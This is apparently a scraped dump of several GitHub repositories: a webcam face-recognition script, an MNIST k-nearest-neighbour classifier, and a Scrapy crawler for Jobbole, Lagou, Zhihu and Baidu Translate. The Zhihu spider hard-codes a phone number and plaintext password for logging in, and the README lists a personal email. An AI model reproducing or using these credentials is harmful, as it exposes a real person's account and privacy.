Face\", predict_image[y: y + h, x: x + w])\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ndef main_func():\n camera_feed = cv2.VideoCapture(0)\n training()\n frame_count = 0\n while (camera_feed.isOpened()):\n ret, frame = camera_feed.read()\n frame_count += 1\n if frame_count % 60 == 0 and camera_feed is not None:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n i = 1\n for (x, y, w, h) in faces:\n img = Image.fromarray(frame[y:y + h, x:x + w])\n face_detected = img.convert('L')\n filename = './detected_faces/face_detected' + str(i) + '.png'\n cv2.imwrite(filename, np.array(face_detected))\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)\n recognize(filename)\n roi_gray = gray[y:y + h, x:x + w]\n roi_color = frame[y:y + h, x:x + w]\n i += 1\n cv2.imshow('Camera Feed', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n camera_feed.release()\n cv2.destroyAllWindows()\n\nmain_func()"
}
] | 4 |
try1995/k-Nearest-Neighbor-Nearest-Neighbor-Classifier
|
https://github.com/try1995/k-Nearest-Neighbor-Nearest-Neighbor-Classifier
|
a3959e5157ff0afe0b31a06431d9743530ef2a94
|
540c5ee20618cf0b4f880b62acf522db654137fa
|
cbda98728c83778ad9f5f7cc3fae3da9dfa17eba
|
refs/heads/master
| 2020-05-24T14:05:15.446810 | 2019-05-19T01:55:33 | 2019-05-19T01:55:33 | 187,302,525 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6084855198860168,
"alphanum_fraction": 0.6240601539611816,
"avg_line_length": 26.80596923828125,
"blob_id": "4275dfdcabc67d18fda26c1ee745fd7746f37926",
"content_id": "ae910a5a39c758006324b65203b8aa0ce29ef5b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1902,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 67,
"path": "/utils.py",
"repo_name": "try1995/k-Nearest-Neighbor-Nearest-Neighbor-Classifier",
"src_encoding": "UTF-8",
"text": "import os\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\nmnist_path = r\"./MINST\"\n\n\ndef load_mnist(path, kind='train'):\n \"\"\"Load MNIST data from `path`\"\"\"\n labels_path = os.path.join(path, '%s-labels.idx1-ubyte' % kind)\n images_path = os.path.join(path, '%s-images.idx3-ubyte' % kind)\n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II', lbpath.read(8))\n labels = np.fromfile(lbpath, dtype=np.uint8)\n\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack('>IIII', imgpath.read(16))\n images = np.fromfile(imgpath, dtype=np.uint8).reshape(len(labels), 784)\n\n return images, labels\n\n\ndef image_show_many(images_matrix, labels_matrix):\n fig, ax = plt.subplots(nrows=2,ncols=5, sharex=True, sharey=True)\n ax = ax.flatten()\n for i in range(10):\n img = images_matrix[labels_matrix == i][0].reshape(28, 28)\n ax[i].imshow(img, cmap='Greys', interpolation='nearest')\n ax[i].set_title(i)\n ax[0].set_xticks([])\n ax[0].set_yticks([])\n plt.tight_layout()\n plt.show()\n\n\ndef image_show(images_matrix):\n fig, ax = plt.subplots()\n img = images_matrix.reshape(28, 28)\n ax.imshow(img, cmap='Greys', interpolation='nearest')\n ax.set_xticks([])\n ax.set_yticks([])\n plt.tight_layout()\n plt.show()\n\n\ndef svm_loss(x, y, w):\n # x一维行向量,y用一个整数表示标签,w权值矩阵\n scores = w.dot(x)\n margins = np.maximum(0, scores - scores[y] + 1)\n margins[y] = 0\n loss_i = np.sum(margins)\n return loss_i\n\n\ndef softmax_loss():\n pass\n\n\ndef full_loss(loss, w, x):\n ret = np.average(loss) + x*np.sum(pow(np.array(w), 2))\n return ret\n\n\nif __name__ == '__main__':\n images_matrix, labels_matrix = load_mnist(mnist_path)\n # print(type(images_matrix), labels_matrix)\n image_show_many(images_matrix, labels_matrix)"
},
{
"alpha_fraction": 0.843137264251709,
"alphanum_fraction": 0.843137264251709,
"avg_line_length": 29.600000381469727,
"blob_id": "b55b8b611bd0d7adcab616c4c8a7cb031a1fb96d",
"content_id": "53546f0ba0652dc313f4839a20d1c188f460711d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 307,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 5,
"path": "/README.md",
"repo_name": "try1995/k-Nearest-Neighbor-Nearest-Neighbor-Classifier",
"src_encoding": "UTF-8",
"text": "# k-Nearest-Neighbor-Nearest-Neighbor-Classifier;\nKNN算法和最近邻算法,训练集是手写体训练集MINST;\n训练集已经解压,untils中有打开方法和转化数据集为图片的方法\n小练习,命名比较随意,请海涵,如有错误,欢迎交流指导;\n个人邮箱:[email protected]\n"
},
{
"alpha_fraction": 0.6071428656578064,
"alphanum_fraction": 0.6221804618835449,
"avg_line_length": 35.06779479980469,
"blob_id": "11f0b8e6c9e0d03f03e721d1dff9377ccba7b6bc",
"content_id": "953dba67b6815b63615ed5a553e94fb0a904b07a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2264,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 59,
"path": "/KNN.py",
"repo_name": "try1995/k-Nearest-Neighbor-Nearest-Neighbor-Classifier",
"src_encoding": "UTF-8",
"text": "from KNN_FOR_MINST_DATABSE.nearest_neighbor import *\nfrom KNN_FOR_MINST_DATABSE.utils import *\n\n\nclass KNearestNeighbor:\n def __init__(self, X, y, k):\n self.ytr = y\n self.Xtr = X\n self.k = k\n\n def predict(self, X):\n num_test = X.shape[0]\n Ypred = np.zeros(num_test, dtype=self.ytr.dtype)\n for i in range(num_test):\n # print(\"正在比较第%s个\" % (i+1))\n distances = np.sum(np.abs(self.Xtr - X[i, :]), axis=1)\n k_ls = []\n flag = self.k\n while flag:\n min_index = np.argmin(distances)\n k_ls.append(self.ytr[min_index])\n distances = np.delete(distances, min_index, axis=0)\n flag -= 1\n Ypred[i] = np.argmax(np.bincount(np.array(k_ls)))\n\n return Ypred\n\n\ndef test_nearest_neighbor_classifier(slices):\n images_matrix, labels_matrix = load_mnist(mnist_path)\n text_images_matrix, text_labels_matrix = load_mnist(mnist_path, kind='t10k')\n NNAPP = NearestNeighbor(images_matrix, labels_matrix)\n ret = NNAPP.predict(text_images_matrix[0:slices])\n # print('predict_labels:', ret)\n # print('real_labels:', text_labels_matrix[0:slices])\n print(np.mean(ret == text_labels_matrix[0:slices]))\n\n\ndef test_k_nearest_neighbor_classifier(k, slices):\n images_matrix, labels_matrix = load_mnist(mnist_path)\n text_images_matrix, text_labels_matrix = load_mnist(mnist_path, kind='t10k')\n NNAPP = KNearestNeighbor(images_matrix, labels_matrix, k)\n ret = NNAPP.predict(text_images_matrix[0:slices])\n # print(np.mean(text_labels_matrix == ret))\n # print('predict_labels:', ret)\n # print('real_labels:', text_labels_matrix[0:slices])\n print(np.mean(ret == text_labels_matrix[0:slices]))\n\n\nif __name__ == '__main__':\n '''300为训练个数,越大时间越长,\n 建议第一次跑30,3,5,6,7,9为k的值,将上面的注释去掉可以打印输出预测的标签和真实标签,\n 函数输出的是准确率'''\n N = 300\n test_k_nearest_neighbor_classifier(3, N)\n test_k_nearest_neighbor_classifier(5, N)\n test_k_nearest_neighbor_classifier(7, N)\n test_k_nearest_neighbor_classifier(9, N)\n test_nearest_neighbor_classifier(N)\n"
}
] | 3 |
sunzhongyuan/ArticleSpider
|
https://github.com/sunzhongyuan/ArticleSpider
|
e3c3a89fb20a701dc02e9fd2ca169359bd23017f
|
a92b66a2fa3f3c9190435423b5d5eeb09429bd60
|
dcf9bd867948ec6eeb125a4e17df0efcf0e5cf98
|
refs/heads/master
| 2021-04-26T22:30:10.580913 | 2018-03-06T16:12:10 | 2018-03-06T16:12:10 | 124,103,729 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5146048069000244,
"alphanum_fraction": 0.5420961976051331,
"avg_line_length": 30.45945930480957,
"blob_id": "a48820f8ba138537a6d82f1d63bce79f1d307c72",
"content_id": "d3551d113e904d645d5a53d0b960771e2a994af2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1164,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 37,
"path": "/ArticleSpider/spiders/baidu_trans.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass BaiduTransSpider(scrapy.Spider):\n name = 'baidu_trans'\n allowed_domains = ['http://fanyi.baidu.com']\n start_urls = ['http://fanyi.baidu.com']\n\n agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'\n header = {\n 'Host': 'fanyi.baidu.com',\n 'Referer': 'http://fanyi.baidu.com/translate',\n 'User-Agent': agent\n }\n\n def parse(self, response):\n with open('aaa.html', 'wb') as w:\n w.write(response.text.encode('utf-8'))\n post_data = {\n 'from': 'en',\n 'to': 'zh',\n 'query': 'GitHub test',\n 'transtype': 'translang',\n 'simple_means_flag': '3'\n }\n return [scrapy.FormRequest(\n url='http://fanyi.baidu.com/translate#en/zh/GitHub%20test',\n formdata=post_data,\n headers=self.header,\n callback=self.to_file\n )]\n\n def to_file(self, response):\n print(response.text)\n with open('bbb.html', 'wb') as w:\n w.write(response.text.encode('utf-8'))\n"
},
{
"alpha_fraction": 0.6677486896514893,
"alphanum_fraction": 0.6716902256011963,
"avg_line_length": 36.17241287231445,
"blob_id": "ee043115551fcaec314dae601458efdcdb057910",
"content_id": "30b2728a60c299ab8797260b730ca09e78df7a09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5483,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 116,
"path": "/ArticleSpider/pipelines.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom scrapy.pipelines.images import ImagesPipeline\nimport codecs # python2中用这个读写文件可以避免字符编码问题,python3中直接用open打开就行\nimport json\nfrom scrapy.exporters import JsonItemExporter # scrapy提供的用于将item导出成Json模式,还支持其他模式\nimport MySQLdb # 用于创建数据库链接\nimport MySQLdb.cursors\nfrom twisted.enterprise import adbapi # 提供异步容器,这里用于异步操作数据库\n\n\nclass ArticlespiderPipeline(object):\n def process_item(self, item, spider):\n return item\n\n\n# 导出json文件第一种方法:手动进行json文件的导出\nclass JsonWithEncodingPipeline(object):\n # 自定义json文件的导出\n def __init__(self):\n # 打开一个json文件\n self.file = codecs.open('article.json', 'w', encoding='utf-8')\n\n def process_item(self, item, spider):\n # item转换为json模式,ensure_ascii=False如果不写这个的话写入中文的时候会乱码,写了这个字符会以unicode的模式转换为json\n lines = json.dumps(dict(item), ensure_ascii=False)\n # 把生成的json串写入json文件\n self.file.write(lines)\n return item\n\n # 在这个函数里关闭文件\n def spider_close(self, spider):\n self.file.close()\n\n\n# 插入数据库第一种方法:同步插入mysql数据库\nclass MysqlPipeline(object):\n def __init__(self):\n self.conn = MySQLdb.connect('127.0.0.1', 'root', '1218', 'article_spider', charset='utf8', use_unicode=True)\n self.cursor = self.conn.cursor()\n\n def process_item(self, item, spider):\n insert_sql = '''\n insert into article(title, url, url_object_id, create_date, fav_nums)\n values (%s, %s, %s, %s, %s)\n '''\n # cursor.execute是同步执行\n self.cursor.execute(insert_sql, (item['title'], item['url'], item['url_object_id'], item['create_date'], item['fav_nums']))\n self.conn.commit()\n\n\n# 导出json文件第二种方法:利用scrapy提供的模块导出json文件\nclass JsonExporterPipeline(object):\n def __init__(self):\n self.file = open('article_export.json', 'wb') # 以二进制的方式打开\n self.exporter = JsonItemExporter(self.file, encoding='utf-8', ensure_ascii=False) # 实例化JsonItemExporter\n self.exporter.start_exporting() # 第一步start_exporting\n\n def spider_close(self, spider):\n self.exporter.finish_exporting() # 第三步finish_exporting\n self.file.close()\n\n def process_item(self, item, spider):\n self.exporter.export_item(item) # 第二步export_item\n return item\n\n\n# 插入数据库第二种方法:利用twisted异步插入数据库\nclass MysqlTwistedPipeline(object):\n def __init__(self, dbpool):\n self.dbpool = dbpool\n\n @classmethod # 类方法,类不用实例化就可以调用的方法\n def from_settings(cls, settings): # 这个方法sipder会调用,将setting文件传入, 在这里可以获取setting文件内容\n dbparms = dict(\n host=settings['MYSQL_HOST'], # 这样获取setting文件参数\n db=settings['MYSQL_DBNAME'],\n user=settings['MYSQL_USER'],\n password=settings['MYSQL_PASSWORD'],\n charset='utf8',\n cursorclass=MySQLdb.cursors.DictCursor,\n use_unicode=True\n ) # 这些是连接数据库需要的参数,key值对应MySQLdb.connect的参数名\n dbpool = adbapi.ConnectionPool('MySQLdb', **dbparms) # 生成连接池,目前只支持关系型数据库\n\n return cls(dbpool) # 返回一个当前类的实例\n\n def process_item(self, item, spider):\n query = self.dbpool.runInteraction(self.do_insert, item) # 利用twisted异步执行sql语句\n query.addErrback(self.handle_error, item, spider) # 处理异步执行的异常,传入item是为了查看哪个item出错\n\n # 这个函数打印sql错误信息,传入item、spider便于查看哪错了\n # 调试时可以在这里打断点,及时发现错误\n def handle_error(self, failure, item, spider):\n print(failure)\n\n # 这里执行具体的sql语句\n # 为了达到公用的目的,避免每个item都写一个sql,这里将sql语句写在了item的get_insert_sql函数里,\n # 调用get_insert_sql方法得到insert语句,执行这个语句即可\n def do_insert(self, cursor, item):\n insert_sql, params = item.get_insert_sql()\n cursor.execute(insert_sql, params)\n\n\n# 继承自ImagesPipeline,ImagesPipeline是scrappy提供的下载图片模块,重写这个类的方法可以自定义一些功能\nclass ArticleImagePipeline(ImagesPipeline):\n def item_completed(self, results, item, info): # 重写这个方法可以获取图片文件保存到本地的路径\n if 'front_image_url' in item: # 公共下载模块,如果没有图片要下载,就不执行以下获取图片存储路径的语句,否则会报错\n for ok, value in results: # results中存储了图片存放的路径,results是一个元祖(True or False, {'path':'full/image.jpg'})\n image_file_path = value['path']\n item[\"front_image_path\"] = image_file_path\n return item\n\n"
},
{
"alpha_fraction": 0.6246246099472046,
"alphanum_fraction": 0.6276276111602783,
"avg_line_length": 26.33333396911621,
"blob_id": "b388ef90e24cee0e74b154b0c095ea147f705552",
"content_id": "b822bf319b5472b5b40cec814751c3b080715696",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 333,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 12,
"path": "/main.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n__author__ = 'zyzy'\n\nfrom scrapy.cmdline import execute\nimport sys\nimport os\n\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\n# execute(['scrapy', 'crawl', 'jobbole'])\nexecute(['scrapy', 'crawl', 'lagou'])\n# execute(['scrapy', 'crawl', 'zhihu'])\n# execute(['scrapy', 'crawl', 'baidu_trans'])\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.61654132604599,
"alphanum_fraction": 0.6240601539611816,
"avg_line_length": 13.777777671813965,
"blob_id": "79f6c53d55f715edf6d606c577b8eb545a04d802",
"content_id": "ccd3227661953537114caf0e49bac533005ca801",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 133,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 9,
"path": "/ArticleSpider/utils/zheye_test.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n__author__ = 'zyzy'\n\nfrom zheye import zheye\n\n\nz = zheye()\npositions = z.Recognize('a.gif')\nprint(positions)\n"
},
{
"alpha_fraction": 0.6958041787147522,
"alphanum_fraction": 0.7543706297874451,
"avg_line_length": 26.926828384399414,
"blob_id": "f8fe094353a4ecb83e50ec5caa4e0253d1f61212",
"content_id": "783bda30eff54da87c295a64163f0626ec758939",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1218,
"license_type": "no_license",
"max_line_length": 223,
"num_lines": 41,
"path": "/ArticleSpider/utils/test.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n__author__ = 'zyzy'\n\nimport urllib.request\nimport http.cookiejar\n\nurl = 'http://www.baidu.com'\nurl = 'http://fanyi.baidu.com/translate#en/zh/GitHub%20is%20home%20to%20over%2020%20million%20developers%20working%20together%20to%20host%20and%20review%20code%2C%20manage%20projects%2C%20and%20build%20software%20together.'\n\n# 直接通过url来获取网页数据\nprint('第一种')\nresponse = urllib.request.urlopen(url)\ncode = response.getcode()\nhtml = response.read()\nmystr = html.decode(\"utf8\")\nresponse.close()\nprint(mystr)\nwith open('bbbb.html', 'w') as w:\n w.write(mystr)\n\n# 构建request对象进行网页数据获取\nprint('第二种')\nrequest2 = urllib.request.Request(url)\nrequest2.add_header('user-agent', 'Mozilla/5.0')\nresponse2 = urllib.request.urlopen(request2)\nhtml2 = response2.read()\nmystr2 = html2.decode(\"utf8\")\nresponse2.close()\nprint(mystr2)\n\n# 使用cookies来获取\nprint('第三种')\ncj = http.cookiejar.LWPCookieJar()\nopener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))\nurllib.request.install_opener(opener)\nresponse3 = urllib.request.urlopen(url)\nprint(cj)\nhtml3 = response3.read()\nmystr3 = html3.decode(\"utf8\")\nresponse3.close()\nprint(mystr3)"
},
{
"alpha_fraction": 0.6150326132774353,
"alphanum_fraction": 0.6275025606155396,
"avg_line_length": 44.27979278564453,
"blob_id": "80a6602e9967bd7bbec32568634a8fd61932da55",
"content_id": "04101367572de734d490b1e78af01a101996eac7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10585,
"license_type": "no_license",
"max_line_length": 699,
"num_lines": 193,
"path": "/ArticleSpider/spiders/zhihu.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nimport json\nimport time\nfrom PIL import Image\nfrom urllib import parse\nfrom scrapy.loader import ItemLoader\nfrom items import ZhihuQuestionItem, ZhihuAnswerItem\nimport datetime\n\n\nclass ZhihuSpider(scrapy.Spider):\n name = 'zhihu'\n allowed_domains = ['www.zhihu.com']\n start_urls = ['http://www.zhihu.com/']\n\n agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36'\n header = {\n 'HOST': 'www.zhihu.com',\n 'Referer': 'https://www.zhihu.com',\n 'User-Agent': agent\n }\n\n # 获取问题回答的url,第一个参数是问题的ID,第二个参数offset是从第几个获取,limit=20表示每次返回回答的个数,默认20\n answer_url = 'https://www.zhihu.com/api/v4/questions/{0}/answers?include=data%5B*%5D.is_normal%2Cadmin_closed_comment%2Creward_info%2Cis_collapsed%2Cannotation_action%2Cannotation_detail%2Ccollapse_reason%2Cis_sticky%2Ccollapsed_by%2Csuggest_edit%2Ccomment_count%2Ccan_comment%2Ccontent%2Ceditable_content%2Cvoteup_count%2Creshipment_settings%2Ccomment_permission%2Ccreated_time%2Cupdated_time%2Creview_info%2Crelevant_info%2Cquestion%2Cexcerpt%2Crelationship.is_authorized%2Cis_author%2Cvoting%2Cis_thanked%2Cis_nothelp%2Cupvoted_followees%3Bdata%5B*%5D.mark_infos%5B*%5D.url%3Bdata%5B*%5D.author.follower_count%2Cbadge%5B%3F(type%3Dbest_answerer)%5D.topics&offset={1}&limit=20&sort_by=default'\n\n # yield的request没有指定callback函数,默认调用这个函数\n def parse(self, response):\n # 深度优先爬取知乎\n # 这里从知乎主页获取所有URL链接,循环这些链接,判断链接格式,是question的进行question解析,\n # 不是question的循环调用本函数,继续判断url格式\n\n # 获取本页面所有的url\n all_urls = response.css('a::attr(href)').extract()\n # 拼接成完整url\n all_urls = [parse.urljoin(response.url, url) for url in all_urls]\n # 过滤URL\n all_urls = filter(lambda x: True if x.startswith('https') else False, all_urls)\n # 循环URL\n for url in all_urls:\n # 调试指定页面时可以指定url\n # url = 'https://www.zhihu.com/question/41363928'\n print(url)\n # 判断URL格式,是问题页面的,request获取这个页面,在parse_question函数中解析问题,存储到问题的item里\n match_obj = re.match('(.*zhihu.com/question/(\\d+))', url)\n if match_obj:\n request_url = match_obj.group(1)\n question_id = match_obj.group(2)\n yield scrapy.Request(request_url, headers=self.header, meta={'question_id': question_id},\n callback=self.parse_question)\n # 调试时这里可以加一个break,这样只会下载一个问题页面进行处理,便于分析问题\n break\n # 不是问题的页面,下载回来继续执行本函数进行分析这个页面的URL,达到深度优先\n else:\n # yield scrapy.Request(url, headers=self.header, callback=self.parse)\n pass\n\n def parse_question(self, response):\n zhihu_id = response.meta.get('question_id', '')\n\n # 使用ItemLoader加载item\n item_loader = ItemLoader(ZhihuQuestionItem(), response=response)\n item_loader.add_value('zhihu_id', zhihu_id)\n item_loader.add_css('topics', '.QuestionHeader-topics .Popover div::text')\n item_loader.add_value('url', response.url)\n item_loader.add_css('title', '.QuestionHeader-title::text')\n item_loader.add_css('content', '.QuestionHeader-detail')\n # if 'answer' in response.url:\n # item_loader.add_css('answer_num', '.Question-mainColumn a.QuestionMainAction::text')\n # else:\n # item_loader.add_css('answer_num', '.QuestionAnswers-answers .List-headerText span::text')\n # 从两种不同的样式中获取数据 可以用xpath的 | 或符号\n item_loader.add_xpath('answer_num',\n '//*[@class=\"List-headerText\"]/span/text()|//a[@class=\"QuestionMainAction\"]/text()')\n item_loader.add_css('comments_num', '.QuestionHeader-Comment button::text')\n item_loader.add_css('watch_user_num', '.QuestionFollowStatus .NumberBoard-itemValue::text')\n item_loader.add_css('click_num', '.QuestionFollowStatus .NumberBoard-itemValue::text')\n\n # 根据上面我们定义的规则将ItemLoader加载成question_item\n question_item = item_loader.load_item()\n\n # 如果这个问题有人回答,则发送请求获取回答信息\n # 没有回答将回答数赋值为0\n if 'answer_num' in question_item:\n # 问题页面有回答,我们拼接一个获取回答的请求,进行分析回答\n yield scrapy.Request(self.answer_url.format(zhihu_id, 0), headers=self.header, callback=self.parse_answer)\n else:\n question_item['answer_num'] = ['0']\n\n # 这里yield出去什么,scrapy会自动分析,如果是一个itme,会自动调用pipeline;如果是request会自动下载这个页面,跳转到callback函数\n yield question_item\n\n def parse_answer(self, response):\n # 回答请求返回的是json格式,可以load处理\n ans_json = json.loads(response.text)\n is_end = ans_json['paging']['is_end']\n next_url = ans_json['paging']['next']\n\n for answer in ans_json['data']:\n answer_item = ZhihuAnswerItem()\n answer_item['zhihu_id'] = answer['id']\n answer_item['url'] = answer['url']\n answer_item['question_id'] = answer['question']['id']\n answer_item['author_id'] = answer['author']['id'] if 'id' in answer['author'] else None\n answer_item['content'] = answer['content'] if 'content' in answer else answer['excerpt']\n answer_item['praise_num'] = answer['voteup_count']\n answer_item['comments_num'] = answer['comment_count']\n answer_item['create_time'] = answer['created_time']\n answer_item['update_time'] = answer['updated_time']\n # answer_item['crawl_time'] = datetime.datetime.now()\n answer_item['crawl_time'] = time.time()\n\n yield answer_item\n\n # 判断是否结束,如果没有结束进行请求next_url,next_url是json返回的\n if not is_end:\n yield scrapy.Request(next_url, headers=self.header, callback=self.parse_answer)\n\n # start_requests是spider的入口函数,循环发送start_urls数组里的url\n # 这里重写这个函数,实现登陆知乎的操作,登陆之后才能爬取知乎的内容\n # 这个函数需要返回一个数组,scrapy的代码这里需要一个可迭代的,具体没研究\n def start_requests(self):\n # 第一步需要登陆,登陆需要获取xsrf,获取xsrf可以像zhihu_login_requests.py里的get_xsrf函数那样获取\n # 也可以用scrapy异步请求一个URL,获得页面的response,然后回调一个函数,在那个函数里通过正则获取到xsrf\n\n # 以下yield return都可以 有什么区别呢\n # 初步猜测:yield多应用于循环中,循环请求一个数组中的多个url,处理完一个url后继续回到这里再发送下一个请求\n # return就直接提交里,这个函数就结束了\n # return [scrapy.Request('https://www.zhihu.com/#signin', callback=self.login, headers=self.header)]\n # yield scrapy.Request('https://www.zhihu.com/#signin', callback=self.login, headers=self.header)\n\n # 新版去掉xsrf\n return [scrapy.Request('https://www.zhihu.com/explore', callback=self.login, headers=self.header)]\n\n def login(self, response):\n match_obj = re.search('.*xsrf.*value=\"(.*?)\"', response.text)\n if match_obj:\n xsrf = match_obj.group(1)\n else:\n xsrf = '新版去掉xsrf'\n if xsrf:\n post_url = \"https://www.zhihu.com/login/phone_num\"\n post_data = {\n # '_xsrf': xsrf,\n 'phone_num': '15522523676',\n 'password': 'sun112788',\n 'remember_me': 'true'\n }\n\n # 获取验证码\n # 获取验证码图片我们需要发送一个请求,直接发送请求会导致这个请求和当前请求不在同一会话内\n # 这里用yield是为了保证验证码和登陆在一个会话内,scrapy中yield会保证在同一个会话内操作,利用callback函数衔接\n t = str(int(time.time() * 1000))\n captcha_url = 'https://www.zhihu.com/captcha.gif?r={0}&type=login'.format(t)\n yield scrapy.Request(url=captcha_url, headers=self.header,\n meta={'post_data': post_data, 'post_url': post_url}, callback=self.login_after_captcha)\n\n # 识别验证码请求返回的验证码图片中的验证码,将验证码加入的请求登陆的表单中,提交表单登陆\n def login_after_captcha(self, response):\n with open('captcha.jpg', 'wb') as f:\n f.write(response.body)\n\n # 显示图片\n im = Image.open('captcha.jpg')\n im.show()\n im.close()\n\n # 在console输入图片中的验证码\n captcha = input('输入验证码\\n>')\n\n post_url = response.meta.get('post_url', '')\n post_data = response.meta.get('post_data', {})\n post_data['captcha'] = captcha\n # FormRequest可以提供form表单的提交\n # 这里再提交一个form表单的请求,看看知乎给返回什么\n # 我们提交的登陆请求,获取response,在callback函数里判断是否登陆成功\n # 登陆成功就可以继续执行start_requests本来需要执行的代码\n return [scrapy.FormRequest(\n url=post_url,\n formdata=post_data,\n headers=self.header,\n callback=self.check_login\n )]\n\n # 验证是否登陆成功\n def check_login(self, response):\n text_json = json.loads(response.text)\n print(text_json)\n if 'msg' in text_json and text_json['msg'] == '登录成功':\n for url in self.start_urls:\n # scrapy的所有请求如果不指定callback函数,则默认调用parse函数,默认的\n yield scrapy.Request(url, dont_filter=True, headers=self.header)\n\n\n"
},
{
"alpha_fraction": 0.45738089084625244,
"alphanum_fraction": 0.47276222705841064,
"avg_line_length": 34.45454406738281,
"blob_id": "8e57044c59725729b45717072343b83a0c9f1e4c",
"content_id": "73e44e460f4ebb75f003d5988753cde8f2e1429e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4705,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 132,
"path": "/ArticleSpider/utils/baidu_translate.py",
"repo_name": "sunzhongyuan/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n__author__ = 'zyzy'\nimport requests\nimport json\nimport sys\nimport os.path\nimport time\n\n\nclass BaiduTranslate:\n def __init__(self, query, outfile=None, type='f'):\n self.query = query\n self.outfile = outfile\n self.type = type\n self.url = 'http://fanyi.baidu.com/v2transapi'\n self.url_bing = 'https://www.bing.com/translator/api/Dictionary/Lookup?from=en&to=zh-CHS'\n self.url_bing = 'https://www.bing.com/translator/api/Translate/TranslateArray?from=-&to=zh-CHS'\n self.header = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)'\n ' Version/11.0.2 Safari/604.4.7'\n }\n self.header_bing = {\n 'Referer': 'https://www.bing.com/translator/',\n 'Content-Type': 'application/json;charset=UTF-8',\n 'Origin': 'https://www.bing.com',\n 'Host': 'www.bing.com',\n 'Accept': 'application/json,text/javascript,*/*;q=0.01',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.7 (KHTML, like Gecko)'\n ' Version/11.0.2 Safari/604.4.7'\n }\n self.post_date = {\n 'from': 'en',\n 'to': 'zh',\n 'query': 'test',\n 'transtype': 'translang',\n 'simple_means_flag': '3'\n }\n self.post_date_bing = {\n \"from\": \"en\",\n \"to\": \"zh-CHS\",\n }\n self.post_json_bing = json.dumps({\n \"from\": \"en\",\n \"to\": \"zh-CHS\",\n \"items\": [\n {\n # \"id\": str(int(time.time() * 1000))[10:0:-1],\n \"id\": '112785',\n \"text\": \"red\",\n \"wordAlignment\": \"\"\n }\n ]\n })\n\n def run(self):\n if self.outfile:\n with open(self.outfile, 'w')as w:\n if os.path.isfile(self.query) and self.type == 'f':\n with open(self.query, 'r') as f:\n while True:\n query = f.readline()\n if query:\n w.write(self.translate(query) + '\\n')\n else:\n break\n else:\n w.write(self.translate(self.query))\n return self.outfile\n else:\n result = ''\n if os.path.exists(self.query) and self.type == 'f':\n with open(self.query, 'r') as f:\n while True:\n query = f.readline()\n if query:\n result = result + self.translate(query) + '\\n'\n else:\n break\n else:\n result = self.translate(self.query)\n return result\n\n def translate(self, query):\n if self.check_cn(query):\n self.post_date['from'] = 'zh'\n self.post_date['to'] = 'en'\n else:\n self.post_date['from'] = 'en'\n self.post_date['to'] = 'zh'\n self.post_date['query'] = query\n response = requests.post(self.url, self.post_date, headers=self.header)\n response = response.content.decode()\n dict_response = json.loads(response)\n return dict_response['trans_result']['data'][0]['dst']\n\n def translate_bing(self, query):\n if self.check_cn(query):\n 